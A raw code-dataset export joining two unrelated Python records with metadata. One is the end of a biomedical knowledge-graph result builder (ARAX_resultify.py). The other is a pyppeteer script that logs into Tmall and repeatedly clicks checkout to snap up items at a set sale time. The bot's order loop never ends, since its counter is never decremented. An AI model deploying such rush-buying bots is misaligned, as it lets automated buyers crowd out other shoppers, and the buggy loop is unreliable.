that the source ID and target ID of every edge in KG is a valid KG node ---------------------\n node_ids_for_edges_that_are_not_valid_nodes = [edge.source_id for edge in cast(Iterable[Edge], kg.edges) if not\n kg_nodes_map.get(edge.source_id)] + \\\n [edge.target_id for edge in cast(Iterable[Edge], kg.edges) if not\n kg_nodes_map.get(edge.target_id)]\n if len(node_ids_for_edges_that_are_not_valid_nodes) > 0:\n raise ValueError(\"KG has Edges that refer to the following non-existent Nodes: \" + str(node_ids_for_edges_that_are_not_valid_nodes))\n\n # --------------------- checking that the source ID and target ID of every edge in QG is a valid QG node ---------------------\n invalid_qnode_ids_used_by_qedges = [edge.source_id for edge in cast(Iterable[QEdge], qg.edges) if not\n qg_nodes_map.get(edge.source_id)] + \\\n [edge.target_id for edge in cast(Iterable[QEdge], qg.edges) if not\n qg_nodes_map.get(edge.target_id)]\n if len(invalid_qnode_ids_used_by_qedges) > 0:\n raise ValueError(\"QG has QEdges that refer to the following non-existent QNodes: \" + str(invalid_qnode_ids_used_by_qedges))\n\n # --------------------- checking for consistency of edge-to-node relationships, for all edge bindings -----------\n # check that for each bound KG edge, the QG mappings of the KG edges source and target nodes are also the\n # source and target nodes of the QG edge that corresponds to the bound KG edge\n for qedge_id, kg_edge_ids_for_this_qedge_id in kg_edge_ids_by_qg_id.items():\n qg_edge = next(qedge for qedge in qg.edges if qedge.id == qedge_id)\n qg_source_node_id = qg_edge.source_id\n qg_target_node_id = qg_edge.target_id\n for edge_id in kg_edge_ids_for_this_qedge_id:\n kg_edge = kg_edges_map.get(edge_id)\n kg_source_node_id = kg_edge.source_id\n kg_target_node_id = kg_edge.target_id\n if qg_source_node_id != qg_target_node_id:\n edge_valid_in_same_direction = (kg_source_node_id in kg_node_ids_by_qg_id[qg_source_node_id] and\n kg_target_node_id in kg_node_ids_by_qg_id[qg_target_node_id])\n edge_valid_in_opposite_direction = (kg_source_node_id in kg_node_ids_by_qg_id[qg_target_node_id] and\n kg_target_node_id in kg_node_ids_by_qg_id[qg_source_node_id])\n edge_is_valid = (edge_valid_in_same_direction or edge_valid_in_opposite_direction) if ignore_edge_direction else edge_valid_in_same_direction\n if not edge_is_valid:\n kg_source_node = kg_nodes_map.get(kg_source_node_id)\n kg_target_node = kg_nodes_map.get(kg_target_node_id)\n raise ValueError(f\"Edge {kg_edge.id} (fulfilling {qg_edge.id}) has node(s) that do not fulfill the \"\n f\"expected qnodes ({qg_source_node_id} and {qg_target_node_id}). Edge's nodes are \"\n f\"{kg_source_node_id} (qnode_ids: {kg_source_node.qnode_ids}) and \"\n f\"{kg_target_node_id} (qnode_ids: {kg_target_node.qnode_ids}).\")\n\n # ============= save until SAR can discuss with {EWD,DMK} whether there can be unmapped nodes in the KG =============\n # # if any node in the KG is not bound to a node in the QG, drop the KG node; redefine \"kg\" as the filtered KG\n # kg_node_ids_keep = {node.id for node in kg.nodes if node.id in node_bindings_map}\n # kg_nodes_keep_list = [node for node in kg.nodes if node.id in kg_node_ids_keep]\n # kg_edges_keep_list = [edge for edge in kg.edges if not (edge.source_id in kg_node_ids_keep and\n # edge.target_id in kg_node_ids_keep)]\n # kg = KnowledgeGraph(nodes=kg_nodes_keep_list,\n # edges=kg_edges_keep_list)\n # ============= save until SAR can discuss with {EWD,DMK} whether there can be unmapped nodes in the KG =============\n\n # Our goal is to enumerate all distinct \"edge-maximal\" subgraphs of the KG that each \"covers\"\n # the QG. A subgraph of KG that \"covers\" the QG is one for which all of the following conditions hold:\n # (1) under the KG-to-QG node bindings map, the range of the KG subgraph's nodes is the entire set of nodes in the QG\n # (2) for any QG node that has \"is_set=True\", *all* KG nodes that are bound to the same QG node are in the subgraph\n # (3) every edge in the QG is \"covered\" by at least one edge in the KG\n\n results: List[Result] = []\n\n # Return empty result list if the QG isn't fulfilled\n unfulfilled_qnode_ids = [qnode.id for qnode in qg.nodes if not kg_node_ids_by_qg_id.get(qnode.id)]\n unfulfilled_qedge_ids = [qedge.id for qedge in qg.edges if not kg_edge_ids_by_qg_id.get(qedge.id)]\n if unfulfilled_qnode_ids or unfulfilled_qedge_ids or not kg.nodes:\n return results\n\n results = _create_results(kg, qg, ignore_edge_direction)\n\n return results\n\n\ndef _get_connected_qnode(qnode_id: str, qnode_ids_to_choose_from: [str], query_graph: QueryGraph) -> Optional[str]:\n for qedge in query_graph.edges:\n if qedge.source_id == qnode_id and qedge.target_id in qnode_ids_to_choose_from:\n return qedge.target_id\n elif qedge.target_id == qnode_id and qedge.source_id in qnode_ids_to_choose_from:\n return qedge.source_id\n return None\n\n\ndef _get_query_node(qnode_id: str, query_graph: QueryGraph) -> QNode:\n for qnode in query_graph.nodes:\n if qnode.id == qnode_id:\n return qnode\n return None\n\n\ndef _get_query_edge(qedge_id: str, query_graph: QueryGraph) -> QEdge:\n for qedge in query_graph.edges:\n if qedge.id == qedge_id:\n return qedge\n return None\n\n\ndef _get_qnodes_in_order(query_graph: QueryGraph) -> List[QNode]:\n if len(query_graph.edges) == 0:\n return [query_graph.nodes[0]]\n elif len(query_graph.edges) == 1:\n qedge = query_graph.edges[0]\n return [_get_query_node(qedge.source_id, query_graph), _get_query_node(qedge.target_id, query_graph)]\n else:\n qnode_ids_remaining = [qnode.id for qnode in query_graph.nodes]\n ordered_qnode_ids = []\n while qnode_ids_remaining:\n if not ordered_qnode_ids:\n starting_qnode_id = qnode_ids_remaining.pop()\n ordered_qnode_ids = [starting_qnode_id]\n else:\n new_right_most_qnode_id = _get_connected_qnode(ordered_qnode_ids[-1], qnode_ids_remaining, query_graph)\n new_left_most_qnode_id = _get_connected_qnode(ordered_qnode_ids[0], qnode_ids_remaining, query_graph)\n if new_right_most_qnode_id:\n ordered_qnode_ids.append(new_right_most_qnode_id)\n qnode_ids_remaining.pop(qnode_ids_remaining.index(new_right_most_qnode_id))\n elif new_left_most_qnode_id:\n ordered_qnode_ids.insert(0, new_left_most_qnode_id)\n qnode_ids_remaining.pop(qnode_ids_remaining.index(new_left_most_qnode_id))\n else:\n disconnected_qnode_id = qnode_ids_remaining[0]\n ordered_qnode_ids.append(disconnected_qnode_id)\n qnode_ids_remaining.pop(qnode_ids_remaining.index(disconnected_qnode_id))\n return [_get_query_node(qnode_id, query_graph) for qnode_id in ordered_qnode_ids]\n\n\ndef _get_kg_node_ids_by_qg_id(knowledge_graph: KnowledgeGraph) -> Dict[str, Set[str]]:\n node_ids_by_qg_id = dict()\n for node in knowledge_graph.nodes:\n if node.qnode_ids:\n for qnode_id in node.qnode_ids:\n if qnode_id not in node_ids_by_qg_id:\n node_ids_by_qg_id[qnode_id] = set()\n node_ids_by_qg_id[qnode_id].add(node.id)\n return node_ids_by_qg_id\n\n\ndef _get_kg_edge_ids_by_qg_id(knowledge_graph: KnowledgeGraph) -> Dict[str, Set[str]]:\n edge_ids_by_qg_id = dict()\n for edge in knowledge_graph.edges:\n if edge.qedge_ids:\n for qedge_id in edge.qedge_ids:\n if qedge_id not in edge_ids_by_qg_id:\n edge_ids_by_qg_id[qedge_id] = set()\n edge_ids_by_qg_id[qedge_id].add(edge.id)\n return edge_ids_by_qg_id\n\n\ndef _get_connected_qnode_ids(qnode_id: str, query_graph: QueryGraph) -> Set[str]:\n qnode_ids_used_on_same_qedges = set()\n for qedge in query_graph.edges:\n qnode_ids_used_on_same_qedges.add(qedge.source_id)\n qnode_ids_used_on_same_qedges.add(qedge.target_id)\n return qnode_ids_used_on_same_qedges.difference({qnode_id})\n\n\ndef _create_new_empty_result_graph(query_graph: QueryGraph) -> Dict[str, Dict[str, Set[str]]]:\n empty_result_graph = {'nodes': {qnode.id: set() for qnode in query_graph.nodes},\n 'edges': {qedge.id: set() for qedge in query_graph.edges}}\n return empty_result_graph\n\n\ndef _copy_result_graph(result_graph: Dict[str, Dict[str, Set[str]]]) -> Dict[str, Dict[str, Set[str]]]:\n result_graph_copy = {'nodes': {qnode_id: node_ids for qnode_id, node_ids in result_graph['nodes'].items()},\n 'edges': {qedge_id: edge_ids for qedge_id, edge_ids in result_graph['edges'].items()}}\n return result_graph_copy\n\n\ndef _get_edge_node_pair_key(edge: Edge) -> str:\n return \"--\".join(sorted([edge.source_id, edge.target_id]))\n\n\ndef _get_parallel_qedge_ids(input_qedge: QEdge, query_graph: QueryGraph) -> Set[str]:\n input_qedge_node_ids = {input_qedge.source_id, input_qedge.target_id}\n parallel_qedge_ids = {qedge.id for qedge in query_graph.edges if {qedge.source_id, qedge.target_id} == input_qedge_node_ids}\n return parallel_qedge_ids\n\n\ndef _get_kg_node_adj_map_by_qg_id(kg_node_ids_by_qg_id: Dict[str, Set[str]], knowledge_graph: KnowledgeGraph, query_graph: QueryGraph) -> Dict[str, Dict[str, Dict[str, Set[str]]]]:\n # Returned dict looks like {'n00': {'CUI:11234': {'n01': {UniProtKB:122}}}}\n # First initiate the overall structure of our (QG-organized) adjacency map\n kg_node_to_node_map = {qnode_id: dict() for qnode_id in kg_node_ids_by_qg_id}\n for qnode_id, node_ids_set in kg_node_ids_by_qg_id.items():\n connected_qnode_ids = _get_connected_qnode_ids(qnode_id, query_graph)\n for node_id in node_ids_set:\n kg_node_to_node_map[qnode_id][node_id] = {connected_qnode_id: set() for connected_qnode_id in connected_qnode_ids}\n\n # Create a record of which qedge IDs are fulfilled between which node pairs\n node_pair_to_qedge_id_map = dict()\n for edge in knowledge_graph.edges:\n node_pair_key = _get_edge_node_pair_key(edge)\n if node_pair_key not in node_pair_to_qedge_id_map:\n node_pair_to_qedge_id_map[node_pair_key] = set()\n node_pair_to_qedge_id_map[node_pair_key] = node_pair_to_qedge_id_map[node_pair_key].union(set(edge.qedge_ids))\n\n # Fill out which KG nodes are connected to which\n for edge in knowledge_graph.edges:\n for qedge_id in edge.qedge_ids:\n qedge = _get_query_edge(qedge_id, query_graph)\n # Make sure ALL qedges between these two nodes have been fulfilled before marking them as 'connected'\n parallel_qedge_ids = _get_parallel_qedge_ids(qedge, query_graph)\n if parallel_qedge_ids.issubset(node_pair_to_qedge_id_map[_get_edge_node_pair_key(edge)]):\n qnode_id_1 = qedge.source_id\n qnode_id_2 = qedge.target_id\n if edge.source_id in kg_node_ids_by_qg_id[qnode_id_1] and edge.target_id in kg_node_ids_by_qg_id[qnode_id_2]:\n kg_node_to_node_map[qnode_id_1][edge.source_id][qnode_id_2].add(edge.target_id)\n kg_node_to_node_map[qnode_id_2][edge.target_id][qnode_id_1].add(edge.source_id)\n if edge.source_id in kg_node_ids_by_qg_id[qnode_id_2] and edge.target_id in kg_node_ids_by_qg_id[qnode_id_1]:\n kg_node_to_node_map[qnode_id_2][edge.source_id][qnode_id_1].add(edge.target_id)\n kg_node_to_node_map[qnode_id_1][edge.target_id][qnode_id_2].add(edge.source_id)\n return kg_node_to_node_map\n\n\ndef _result_graph_is_fulfilled(result_graph: Dict[str, Dict[str, Set[str]]], query_graph: QueryGraph) -> bool:\n for qnode in query_graph.nodes:\n if not result_graph['nodes'].get(qnode.id):\n return False\n for qedge in query_graph.edges:\n if not result_graph['edges'].get(qedge.id):\n return False\n return True\n\n\ndef _create_results(kg: KnowledgeGraph,\n qg: QueryGraph,\n ignore_edge_direction: bool = True) -> List[Result]:\n result_graphs = []\n kg_node_ids_by_qg_id = _get_kg_node_ids_by_qg_id(kg)\n kg_node_adj_map_by_qg_id = _get_kg_node_adj_map_by_qg_id(kg_node_ids_by_qg_id, kg, qg)\n kg_node_lookup = {node.id: node for node in kg.nodes}\n qnodes_in_order = _get_qnodes_in_order(qg)\n\n # First create result graphs with only the nodes filled out\n for qnode in qnodes_in_order:\n prior_qnode = qnodes_in_order[qnodes_in_order.index(qnode) - 1] if qnodes_in_order.index(qnode) > 0 else None\n if not result_graphs:\n all_node_ids_in_kg_for_this_qnode_id = kg_node_ids_by_qg_id.get(qnode.id)\n if qnode.is_set:\n new_result_graph = _create_new_empty_result_graph(qg)\n new_result_graph['nodes'][qnode.id] = all_node_ids_in_kg_for_this_qnode_id\n result_graphs.append(new_result_graph)\n else:\n for node_id in all_node_ids_in_kg_for_this_qnode_id:\n new_result_graph = _create_new_empty_result_graph(qg)\n new_result_graph['nodes'][qnode.id] = {node_id}\n result_graphs.append(new_result_graph)\n else:\n new_result_graphs = []\n for result_graph in result_graphs:\n node_ids_for_prior_qnode_id = result_graph['nodes'][prior_qnode.id]\n connected_node_ids = set()\n for node_id in node_ids_for_prior_qnode_id:\n connected_node_ids = connected_node_ids.union(kg_node_adj_map_by_qg_id[prior_qnode.id][node_id][qnode.id])\n if qnode.is_set:\n new_result_graph = _copy_result_graph(result_graph)\n new_result_graph['nodes'][qnode.id] = connected_node_ids\n new_result_graphs.append(new_result_graph)\n else:\n for node_id in connected_node_ids:\n new_result_graph = _copy_result_graph(result_graph)\n new_result_graph['nodes'][qnode.id] = {node_id}\n new_result_graphs.append(new_result_graph)\n result_graphs = new_result_graphs\n\n # Then add edges to our result graphs as appropriate\n edges_by_node_pairs = {qedge.id: dict() for qedge in qg.edges}\n for edge in kg.edges:\n if edge.qedge_ids:\n for qedge_id in edge.qedge_ids:\n edge_node_pair = f\"{edge.source_id}--{edge.target_id}\"\n if edge_node_pair not in edges_by_node_pairs[qedge_id]:\n edges_by_node_pairs[qedge_id][edge_node_pair] = set()\n edges_by_node_pairs[qedge_id][edge_node_pair].add(edge.id)\n if ignore_edge_direction:\n node_pair_in_other_direction = f\"{edge.target_id}--{edge.source_id}\"\n if node_pair_in_other_direction not in edges_by_node_pairs[qedge_id]:\n edges_by_node_pairs[qedge_id][node_pair_in_other_direction] = set()\n edges_by_node_pairs[qedge_id][node_pair_in_other_direction].add(edge.id)\n for result_graph in result_graphs:\n for qedge_id in result_graph['edges']:\n qedge = _get_query_edge(qedge_id, qg)\n potential_nodes_1 = result_graph['nodes'][qedge.source_id]\n potential_nodes_2 = result_graph['nodes'][qedge.target_id]\n possible_node_pairs = set()\n for node_1 in potential_nodes_1:\n for node_2 in potential_nodes_2:\n node_pair_key = f\"{node_1}--{node_2}\"\n possible_node_pairs.add(node_pair_key)\n for node_pair in possible_node_pairs:\n ids_of_matching_edges = edges_by_node_pairs[qedge_id].get(node_pair, set())\n result_graph['edges'][qedge_id] = result_graph['edges'][qedge_id].union(ids_of_matching_edges)\n\n final_result_graphs = [result_graph for result_graph in result_graphs if _result_graph_is_fulfilled(result_graph, qg)]\n\n # Convert these into actual object model results\n results = []\n for result_graph in final_result_graphs:\n node_bindings = []\n for qnode_id, node_ids in result_graph['nodes'].items():\n for node_id in node_ids:\n node_bindings.append(NodeBinding(qg_id=qnode_id, kg_id=node_id))\n edge_bindings = []\n for qedge_id, edge_ids in result_graph['edges'].items():\n for edge_id in edge_ids:\n edge_bindings.append(EdgeBinding(qg_id=qedge_id, kg_id=edge_id))\n result = Result(node_bindings=node_bindings, edge_bindings=edge_bindings)\n\n # Fill out the essence for the result\n essence_qnode_id = _get_essence_node_for_qg(qg)\n essence_qnode = _get_query_node(essence_qnode_id, qg)\n essence_kg_node_id_set = result_graph['nodes'].get(essence_qnode_id, set())\n if len(essence_kg_node_id_set) == 1:\n essence_kg_node_id = next(iter(essence_kg_node_id_set))\n essence_kg_node = kg_node_lookup[essence_kg_node_id]\n result.essence = essence_kg_node.name\n if result.essence is None:\n result.essence = essence_kg_node_id\n assert result.essence is not None\n if essence_kg_node.symbol is not None:\n result.essence += \" (\" + str(essence_kg_node.symbol) + \")\"\n result.essence_type = str(essence_qnode.type) if essence_qnode else None\n elif len(essence_kg_node_id_set) == 0:\n result.essence = cast(str, None)\n result.essence_type = cast(str, None)\n else:\n raise ValueError(f\"Result contains more than one node that is a candidate for the essence: {essence_kg_node_id_set}\")\n\n # Programmatically generating an informative description for each result\n # seems difficult, but having something non-None is required by the\n # database. Just put in a placeholder for now, as is done by the\n # QueryGraphReasoner\n result.description = \"No description available\" # see issue 642\n\n results.append(result)\n\n return results\n\n\n\n\n", "sub_path": "code/ARAX/ARAXQuery/ARAX_resultify.py", "file_name": "ARAX_resultify.py", "file_ext": "py", "file_size_in_byte": 38363, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "sys.path.append", "line_number": 37, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.normpath", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 37, "usage_type": "call"}, {"api_name": "swagger_server.models.biolink_entity.BiolinkEntity", "line_number": 52, "usage_type": "name"}, {"api_name": "swagger_server.models.message.Message", "line_number": 104, "usage_type": "name"}, {"api_name": "response.Response", "line_number": 107, "usage_type": "call"}, {"api_name": "response.error", "line_number": 113, "usage_type": "call"}, {"api_name": "response.status", "line_number": 117, "usage_type": "attribute"}, {"api_name": "response.data", "line_number": 121, "usage_type": "attribute"}, {"api_name": "response.debug", "line_number": 124, "usage_type": "call"}, {"api_name": "response.Response", "line_number": 104, "usage_type": "name"}, {"api_name": "swagger_server.models.knowledge_graph.KnowledgeGraph", "line_number": 227, "usage_type": "call"}, {"api_name": "swagger_server.models.q_node.QNode", "line_number": 239, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 244, "usage_type": "name"}, {"api_name": "swagger_server.models.query_graph.QueryGraph", "line_number": 244, "usage_type": "name"}, {"api_name": "swagger_server.models.knowledge_graph.KnowledgeGraph", "line_number": 244, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 248, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 248, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 249, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 249, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 251, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 251, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 246, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 246, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 275, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 275, "usage_type": "name"}, {"api_name": "collections.deque", "line_number": 277, "usage_type": "call"}, {"api_name": "math.inf", "line_number": 278, "usage_type": "attribute"}, {"api_name": "math.isinf", "line_number": 283, "usage_type": "call"}, {"api_name": "typing.cast", "line_number": 284, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 284, "usage_type": "name"}, {"api_name": "math.isinf", "line_number": 285, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 276, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 276, "usage_type": "name"}, {"api_name": "swagger_server.models.query_graph.QueryGraph", "line_number": 291, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 297, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 297, "usage_type": "name"}, {"api_name": "swagger_server.models.q_node.QNode", "line_number": 297, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 298, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 298, "usage_type": "name"}, {"api_name": "swagger_server.models.q_node.QNode", "line_number": 298, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 314, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 314, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 314, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 314, "usage_type": "name"}, {"api_name": "swagger_server.models.q_node.QNode", "line_number": 314, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 343, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 343, "usage_type": "name"}, {"api_name": "swagger_server.models.q_node.QNode", "line_number": 343, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 291, "usage_type": "name"}, {"api_name": "swagger_server.models.knowledge_graph.KnowledgeGraph", "line_number": 362, "usage_type": "name"}, {"api_name": "swagger_server.models.query_graph.QueryGraph", "line_number": 363, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 369, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 369, "usage_type": "name"}, {"api_name": "swagger_server.models.q_node.QNode", "line_number": 369, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 372, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 372, "usage_type": "name"}, {"api_name": "swagger_server.models.node.Node", "line_number": 372, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 375, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 375, "usage_type": "name"}, {"api_name": "swagger_server.models.node.Node", "line_number": 375, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 379, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 379, "usage_type": "name"}, {"api_name": "swagger_server.models.edge.Edge", "line_number": 379, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 387, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 387, "usage_type": "name"}, {"api_name": "swagger_server.models.node.Node", "line_number": 387, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 388, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 388, "usage_type": "name"}, {"api_name": "swagger_server.models.q_node.QNode", "line_number": 388, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 391, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 391, "usage_type": "name"}, {"api_name": "swagger_server.models.edge.Edge", "line_number": 391, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 392, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 392, "usage_type": "name"}, {"api_name": "swagger_server.models.q_edge.QEdge", "line_number": 392, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 407, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 407, "usage_type": "name"}, {"api_name": "swagger_server.models.edge.Edge", "line_number": 407, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 409, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 409, "usage_type": "name"}, {"api_name": "swagger_server.models.edge.Edge", "line_number": 409, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 415, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 415, "usage_type": "name"}, {"api_name": "swagger_server.models.q_edge.QEdge", "line_number": 415, "usage_type": "name"}, {"api_name": "typing.cast", "line_number": 417, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 417, "usage_type": "name"}, {"api_name": "swagger_server.models.q_edge.QEdge", "line_number": 417, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 463, "usage_type": "name"}, {"api_name": "swagger_server.models.result.Result", "line_number": 463, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 364, "usage_type": "name"}, {"api_name": "swagger_server.models.result.Result", "line_number": 364, "usage_type": "name"}, {"api_name": "swagger_server.models.query_graph.QueryGraph", "line_number": 476, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 476, "usage_type": "name"}, {"api_name": "swagger_server.models.query_graph.QueryGraph", "line_number": 485, "usage_type": "name"}, {"api_name": "swagger_server.models.q_node.QNode", "line_number": 485, "usage_type": "name"}, {"api_name": "swagger_server.models.query_graph.QueryGraph", "line_number": 492, "usage_type": "name"}, {"api_name": "swagger_server.models.q_edge.QEdge", "line_number": 492, "usage_type": "name"}, {"api_name": "swagger_server.models.query_graph.QueryGraph", "line_number": 499, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 499, "usage_type": "name"}, {"api_name": "swagger_server.models.q_node.QNode", "line_number": 499, "usage_type": "name"}, {"api_name": "swagger_server.models.knowledge_graph.KnowledgeGraph", "line_number": 528, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 528, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 528, "usage_type": "name"}, {"api_name": "swagger_server.models.knowledge_graph.KnowledgeGraph", "line_number": 539, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 539, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 539, "usage_type": "name"}, {"api_name": "swagger_server.models.query_graph.QueryGraph", "line_number": 550, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 550, "usage_type": "name"}, {"api_name": "swagger_server.models.query_graph.QueryGraph", "line_number": 558, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 558, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 558, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 564, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 564, "usage_type": "name"}, {"api_name": "swagger_server.models.edge.Edge", "line_number": 570, "usage_type": "name"}, {"api_name": "swagger_server.models.q_edge.QEdge", "line_number": 574, "usage_type": "name"}, {"api_name": "swagger_server.models.query_graph.QueryGraph", "line_number": 574, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 574, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 580, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 580, "usage_type": "name"}, {"api_name": "swagger_server.models.knowledge_graph.KnowledgeGraph", "line_number": 580, "usage_type": "name"}, {"api_name": "swagger_server.models.query_graph.QueryGraph", "line_number": 580, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 615, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 615, "usage_type": "name"}, {"api_name": "swagger_server.models.query_graph.QueryGraph", "line_number": 615, "usage_type": "name"}, {"api_name": "swagger_server.models.knowledge_graph.KnowledgeGraph", "line_number": 625, "usage_type": "name"}, {"api_name": "swagger_server.models.query_graph.QueryGraph", "line_number": 626, "usage_type": "name"}, {"api_name": "swagger_server.models.node_binding.NodeBinding", "line_number": 702, "usage_type": "call"}, {"api_name": "swagger_server.models.edge_binding.EdgeBinding", "line_number": 706, "usage_type": "call"}, {"api_name": "swagger_server.models.result.Result", "line_number": 707, "usage_type": "call"}, {"api_name": "typing.cast", "line_number": 724, "usage_type": "call"}, {"api_name": "typing.cast", "line_number": 725, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 627, "usage_type": "name"}, {"api_name": "swagger_server.models.result.Result", "line_number": 627, "usage_type": "name"}]} +{"seq_id": "98106498", "text": "from pyppeteer import launch\nimport datetime\nimport asyncio\nimport multiprocessing\nimport configparser\nimport tbtime\n\ntbtime = tbtime.tbtime\nconf = configparser.ConfigParser()\n\nwidth, height = 1200, 768\ntime_sc_login = 20 # 二维码扫描时间\nclick_freq = 0.5 # 点击间隔\nrepost_order = 0.3 # 页面加载时间\nBEFORE_SECOND = 0 # 提前2秒开始循环点击\npage_nums = 1\nloop_click_sec = 7 # 持续抢购时间\n\n\nasync def login(page):\n await page.setViewport({\"width\": width, \"height\": height})\n print(' {}秒扫码登录: !!!!'.format(time_sc_login))\n await page.goto('https://login.tmall.com')\n count = time_sc_login\n while count >= 0:\n print('\\r 剩余时间:{}'.format(count), end='')\n count -= 1\n await asyncio.sleep(1)\n\n\nasync def goto_cart_pages(browser) -> list:\n pages = []\n for i in range(page_nums):\n page = await browser.newPage()\n await page.setViewport({\"width\": width, \"height\": height})\n await page.goto('https://cart.tmall.com')\n pages.append(page)\n return pages\n\n\nasync def choose_item(pages):\n page_url = []\n for page in pages:\n page_url.append(page.url)\n for i in range(len(pages)):\n await pages[i].bringToFront()\n while page_url[i] == pages[i].url:\n try:\n # await pages[i].click('[for=J_CheckBox_2750006943813]')\n await pages[i].click('[for={}]'.format(str(conf['tmall']['cart'])))\n break\n except KeyError:\n print('未配置页面标签')\n break\n except:\n await asyncio.sleep(click_freq)\n print('未找到商品标签')\n # logging out not find item\n\n\n# 结算按钮\nasync def settle(pages):\n \"\"\"\n 循环所有页面 点击相应的页面\n 判断页面相应结果是否是对应的要求\n \"\"\"\n page_url = []\n for page in pages:\n page_url.append(page.url)\n for i in range(len(pages)):\n await asyncio.sleep(1)\n await pages[i].bringToFront()\n while page_url[i] == pages[i].url:\n try:\n await pages[i].click('#J_SmallSubmit')\n print('提交结算订单')\n except:\n await asyncio.sleep(click_freq)\n print('未找到结算按钮')\n\n\nasync def push_order(pages):\n page_url = []\n for page in pages:\n page_url.append(page.url)\n idx = 0\n loop_times = int(loop_click_sec / click_freq)\n while True:\n if loop_times < 1:\n break\n idx = (idx + 1) % len(pages)\n await pages[idx].bringToFront()\n if page_url[idx] != pages[idx].url:\n await pages[idx].goto(page_url[idx])\n else:\n await pages[idx].reload()\n try:\n await pages[idx].click('.go-btn')\n print('提交订单')\n except:\n print('未找到提交订单按钮')\n await asyncio.sleep(click_freq)\n\n\nasync def main(buy_time):\n conf_init()\n browser = await launch(\n headless=False,\n args=['--disable-infobars', f'--window-size={width},{height}']\n )\n browser = await browser.createIncognitoBrowserContext()\n page = await browser.newPage()\n await login(page)\n pages = await goto_cart_pages(browser)\n await choose_item(pages)\n await settle(pages)\n\n # 等待抢购\n buy_time = datetime.datetime.strptime(buy_time, '%Y-%m-%d %H:%M:%S')\n now_time = datetime.datetime.strptime(tbtime(), '%Y-%m-%d %H:%M:%S')\n wait_second = (buy_time - now_time).seconds if \\\n (buy_time - datetime.datetime.now()).days >= 0 else 0\n print('距离时间还有{}秒\\n'.format(wait_second))\n if wait_second - BEFORE_SECOND > 0:\n await asyncio.sleep(wait_second)\n\n await push_order(pages)\n await asyncio.sleep(3000)\n\n\ndef start(buy_time):\n n_e_l = asyncio.new_event_loop()\n n_e_l.run_until_complete(main(buy_time))\n\n\ndef conf_init():\n conf.read('conf.ini')\n if len(conf['tmall']['cart']) < 10:\n raise Exception('未配置购物车信息')\n\n\nif __name__ == '__main__':\n buy_time = input('请输入开售时间 【2020-02-06(空格)12:55:50】')\n processes = []\n for i in range(1):\n processes.append(multiprocessing.Process(target=start, args=(buy_time,)))\n processes[i].start()\n", "sub_path": "pyping.py", 